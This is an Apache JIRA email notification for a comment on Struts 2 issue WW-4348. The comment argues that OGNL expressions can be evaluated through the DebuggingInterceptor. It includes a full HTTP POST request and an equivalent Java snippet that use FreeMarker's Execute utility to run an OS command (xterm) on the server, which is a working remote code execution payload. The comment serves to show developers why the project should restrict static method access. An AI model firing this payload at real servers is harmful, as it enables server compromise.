[
https://issues.apache.org/jira/browse/WW-4348?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=15809959#comment-15809959
]
Markus Wulftange commented on WW-4348:
--------------------------------------
No, this can be specified where ever OGNL expressions are evaluated. For
example, [via the
DebuggingInterceptor|http://www.pwntester.com/blog/2014/01/21/struts-2-devmode-an-ognl-backdoor/]:
{noformat}
POST /blank-1.0.0/example/HelloWorld.action HTTP/1.1
Host: 127.0.0.1:8080
Content-Type: application/x-www-form-urlencoded
Content-Length: 670
debug=command&expression=%23application["freemarker.Configuration"]["objectWrapper"].newInstance(
%23context["com.opensymphony.xwork2.dispatcher.ServletContext"].classLoader.loadClass("freemarker.template.Template"),
{
%23application["freemarker.Configuration"]["objectWrapper"].wrap(""),
%23application["freemarker.Configuration"]["objectWrapper"].wrap("<%23assign+ex%3d\"freemarker.template.utility.Execute\"%3fnew()>${ex(\"xterm\")}"),
%23application["freemarker.Configuration"]["objectWrapper"].wrap(%23application["freemarker.Configuration"])
}
).process(
null,
%23context["com.opensymphony.xwork2.dispatcher.HttpServletResponse"].getWriter()
)
{noformat}
By the way, the given OGNL expression is equivalent to the following standalone
code:
{noformat}
new Template(
"",
"<#assign
ex=\"freemarker.template.utility.Execute\"?new()>${ex(\"xterm\")}",
Configuration.getDefaultConfiguration()
).process(
null,
new PrintWriter(System.out)
);
{noformat}
> Remove access to static methods
> -------------------------------
>
> Key: WW-4348
> URL: https://issues.apache.org/jira/browse/WW-4348
> Project: Struts 2
> Issue Type: Improvement
> Components: Core Actions
> Affects Versions: 2.3.16.3
> Reporter: Lukasz Lenart
> Priority: Critical
> Fix For: 2.5.x
>
>
--
This message was sent by Atlassian JIRA
(v6.3.4#6332)
